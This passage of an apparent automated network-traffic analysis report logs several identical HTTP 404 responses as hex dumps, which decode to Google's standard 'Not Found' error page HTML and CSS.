31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:16:34 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:16:36 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:16:37 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:16:38 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:16:39 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:16:40 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:16:41 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 